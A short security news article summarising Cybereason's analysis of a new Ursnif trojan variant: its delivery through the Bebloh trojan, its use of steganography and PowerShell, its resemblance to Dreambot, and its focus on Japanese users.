Notorious info-stealing trojan Ursnif is back again with a new variant this year. The latest variant packs a host of advanced features to combat early detection by security tools.
According to a detailed analysis by security firm Cybereason, Ursnif comes with enhanced stealing modules, in addition to using improved delivery methods through another trojan Bebloh.
What are the techniques used - Just like the earlier version, this variant uses steganography to hide malicious content which is decrypted by the PowerShell code. This decrypted code is based on the PowerSploit framework that uses a Portable Executable module for loading and executing the Bebloh’s payload.
Following this process, Bebloh drops Ursnif into the system which is completely compromised upon execution of the latter. Further technical details on the trojan can be found at the Cybereason blog.
What are its capabilities and targets - Cybereason indicated that the variant matches another trojan with similar functionalities. “Based on our code analysis, the newly observed variant bears great resemblance to the Dreambot variant. However, it lacks some commonly observed built-in features like the Tor client and VNC module,” the researchers wrote.
Moreover, this variant was found to aggressively target Japanese users. The specific features built into this variant are an indication of this fact. In addition, telemetry also confirmed its main activity in Japan.